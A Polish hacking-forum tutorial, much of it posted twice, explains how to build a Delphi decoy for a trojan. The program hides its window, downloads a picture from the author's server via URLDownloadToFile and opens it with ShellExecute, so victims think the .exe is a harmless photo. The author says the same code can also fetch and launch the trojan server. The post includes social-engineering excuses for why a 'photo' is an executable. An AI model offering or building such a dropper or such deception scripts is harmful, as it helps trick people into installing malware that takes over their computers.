Nie chciało mi się iść do szkoły to postanowiłem zrobić coś "pożytecznego" i napisać jakiegoś tutka, tylko że nie miałem za bardzo pomysłów, więc napisałem takie o byle jajco xD
Ekhm.. od czego by tu zacząć.. Zapewne większość z szanujących się użytkowników trojanów pobranych z sieci dniami i nocami szuka po internecie bindera który by jako plik *.jpg wsadził doń serwer krwiożerczego trojana.. Otóż drodzy chakierzy.. muszę Was niestety zmartwić. To jest tak bardzo wykonalne jak przejęcie całkowitej kontroli nad czyimś komputerem znając IP (co jest też często Waszym karierowym celem). Więc jakby to ... !! N.I.E. D.A. S.I.Ę. !! Chyba dość jasno to ująłem
Ale za to jest kilka sposobów żeby wymigać się od niezręcznego tłumaczenia ofierze po otwarciu serwerku trojana "Czemu się nic nie otwiera?". Jako żeby uchronić Was od usuwania Waszych tematów z treścią o jakiej wspomniałem wcześniej postanowiłem troszku pomóc. Efektem będzie to, że gdy ofiara otworzy plik wykonywalny to otworzy mu się zdjęcie. Czyli unikniemy co najwyżej tłumaczenia się
co prawda jakieś tam zdolności socjotechniczne się przydadzą bo jakoś tego exe`ka trzeba wytłumaczyć
ale to najmniejszy problem. Powstały program będzie oparty o URLmon więc będzie wykrywany jako tzw "Downloader" co też będzie prawdą xD ale to pozostawiam już Wam. Z pewnością nie jeden z Was będzie się upierał że to kompletnie niepotrzebne, bo przecież można to zrobić zasobami - oooczywiście, ale należę do osób które wolą napisać 2 linijki niebezpieczne zamiast 100 bezpieczniejszych aby uzyskać ten sam efekt
Do rzeczy. Jako że jest to dział Delphi to przydałby się kompilatorek no i podstawowe zdolności myślenia. Oprócz tego potrzebne nam będzie konto na jakimś serwerze ftp
Dość ważna informacja : to nie będzie żaden binder czy cham wie co jeszcze tylko fragmencik kodu serwera trojana, lub downloadera który by takowego pobrał z neta
Let`s gooo!
Otwieramy kompilator. File->New->Application. Zakładam że podstawową chociaż wiedzę macie w temacie więc pozwólcie że ominę szczegóły szczegółów
w onCreate Formy wklikujemy :
nie trzeba znać Delphi żeby skumać o co cho. No ale - kod odpowiedzialny jest za ukrycie formy przed naszymi cudnymi oczami
Teraz chwila relaksu - wrzucamy na serwer FTP jakiś tam obrazek, który otworzy się po otwarciu programu. Załóżmy że nazywa się spocona_w_lodowce.jpg
Dodajemy do uses URLmon oraz ShellApi. Następnie, również w onCreate Formy, dopisujemy :
TADAA! To by było na tyle (dlatego śmieszy mnie nazwa tutorial XD)
Juuuż tłumaczę ten kodzik:
try finally end - tłumaczył nie będę bo podstawy miały być opanowane
Tajemniczy URLDownloadToFile - hmm tu też znający język angliński powinni dać sobie radę z rozkminieniem tejże funkcji xP funkcja ta jest zaimplementowana w bibliotece URLMon którą dodaliśmy na początku. Ta funkcja jest odopowiedzialna za pobranie z internetu strony i zapisania go na dysku. My wykorzystaliśmy ją do pobrania zdjęcia z serwera, które potem zapisaliśmy na dysku C pod nazwą pykczer.jpg. To by było na tyle o tej funkcji.
ShellExecute tak naprawdę nie ma nic wspólnego ze stacją paliw (reklamaaa xD) Wraz z opcją 'open' jest odopwiedzialna za (trudno się domyśleć) otwarcie pliku po prostu xP więc to co wklikaliśmy najzwyczajniej w świecie ściąga zdjątko z naszego serwera i odpala go ofierze dając złudzenie że to to tylko niewinne zdjęcie spoconej w lodówce xP a tu ciaaach - wejście smoka - trojan przejął kontrolę nad kompem xD oczywiście nazwa projektu też musi się nazywać spocona_w_lodówce żeby było to jak najbardziej prawdopodobne xP
jeszcze może wtrące słówko co do wytłumaczenia rozszerzenia... naprawde opcji wytłumaczenia są miliony milionów, ale ja zazwyczaj mówie że skompresowałem zdjęcie jakimś tam kompresorem o koreansko-chinskiej nazwie żeby mniej ważyło albo żeby szybciej wysłać xD jeśli dasz jakąkolwiek sensowną odpowiedź na pytanie "Dlaczego exe?" to nikt się do tego za bardzo nie będzie przyczepiał
człowiek po prostu potrzebuje odpowiedzi. Jakbyś sie zastanawiał co odpowiedzieć na to pytanie to na pewno by tego nie otworzył xD spryt to podstawa w życiu xP
dys ys di end xP
Jak wspomniałem wcześniej, może to być cząstka trojana która po prostu będzie odpowiedzialna za pokazanie zdjęcia a tak naprawdę odpalenia trojana, ale może być też użyta jako program który pobierze zdjęcie, wyświetli je oraz dopiero wtedy pobierze z serwera serwer trojana również przez URLDownloadToFile oraz odpali poprzez ShellExecute tak jak to zrobiliśmy ze zdjęciem
Ja tylko podsunąłem pomysł co by zrobić żeby zamieszać ze zdjęciem xD
Musiałem pousuwać troche emotikon, bo mają tutaj ograniczenie xD A ja tak je luuubie xD
niemile widziane karcące komentarze xD toż to pisane z troski ^^ xP
Ekhm.. od czego by tu zacząć.. Zapewne większość z szanujących się użytkowników trojanów pobranych z sieci dniami i nocami szuka po internecie bindera który by jako plik *.jpg wsadził doń serwer krwiożerczego trojana.. Otóż drodzy chakierzy.. muszę Was niestety zmartwić. To jest tak bardzo wykonalne jak przejęcie całkowitej kontroli nad czyimś komputerem znając IP (co jest też często Waszym karierowym celem). Więc jakby to ... !! N.I.E. D.A. S.I.Ę. !! Chyba dość jasno to ująłem
Dość ważna informacja : to nie będzie żaden binder czy cham wie co jeszcze tylko fragmencik kodu serwera trojana, lub downloadera który by takowego pobrał z neta
Let`s gooo!
Otwieramy kompilator. File->New->Application. Zakładam że podstawową chociaż wiedzę macie w temacie więc pozwólcie że ominę szczegóły szczegółów
Kod:
Application.ShowMainForm := false;Teraz chwila relaksu - wrzucamy na serwer FTP jakiś tam obrazek, który otworzy się po otwarciu programu. Załóżmy że nazywa się spocona_w_lodowce.jpg
Dodajemy do uses URLmon oraz ShellApi. Następnie, również w onCreate Formy, dopisujemy :
Kod:
try
URLDownloadToFile(nil, '[url]http://www.nasz.serwer.pl/spocona_w_lodowce.jpg'[/url], PChar('c:\pykczer.jpg'),0, nil);
finally
ShellExecute(0,'open','c:\pykczer.jpg',nil,nil,SW_SHOW);
end;Juuuż tłumaczę ten kodzik:
try finally end - tłumaczył nie będę bo podstawy miały być opanowane
Tajemniczy URLDownloadToFile - hmm tu też znający język angliński powinni dać sobie radę z rozkminieniem tejże funkcji xP funkcja ta jest zaimplementowana w bibliotece URLMon którą dodaliśmy na początku. Ta funkcja jest odopowiedzialna za pobranie z internetu strony i zapisania go na dysku. My wykorzystaliśmy ją do pobrania zdjęcia z serwera, które potem zapisaliśmy na dysku C pod nazwą pykczer.jpg. To by było na tyle o tej funkcji.
ShellExecute tak naprawdę nie ma nic wspólnego ze stacją paliw (reklamaaa xD) Wraz z opcją 'open' jest odopwiedzialna za (trudno się domyśleć) otwarcie pliku po prostu xP więc to co wklikaliśmy najzwyczajniej w świecie ściąga zdjątko z naszego serwera i odpala go ofierze dając złudzenie że to to tylko niewinne zdjęcie spoconej w lodówce xP a tu ciaaach - wejście smoka - trojan przejął kontrolę nad kompem xD oczywiście nazwa projektu też musi się nazywać spocona_w_lodówce żeby było to jak najbardziej prawdopodobne xP
jeszcze może wtrące słówko co do wytłumaczenia rozszerzenia... naprawde opcji wytłumaczenia są miliony milionów, ale ja zazwyczaj mówie że skompresowałem zdjęcie jakimś tam kompresorem o koreansko-chinskiej nazwie żeby mniej ważyło albo żeby szybciej wysłać xD jeśli dasz jakąkolwiek sensowną odpowiedź na pytanie "Dlaczego exe?" to nikt się do tego za bardzo nie będzie przyczepiał
dys ys di end xP
Jak wspomniałem wcześniej, może to być cząstka trojana która po prostu będzie odpowiedzialna za pokazanie zdjęcia a tak naprawdę odpalenia trojana, ale może być też użyta jako program który pobierze zdjęcie, wyświetli je oraz dopiero wtedy pobierze z serwera serwer trojana również przez URLDownloadToFile oraz odpali poprzez ShellExecute tak jak to zrobiliśmy ze zdjęciem
Musiałem pousuwać troche emotikon, bo mają tutaj ograniczenie xD A ja tak je luuubie xD
niemile widziane karcące komentarze xD toż to pisane z troski ^^ xP
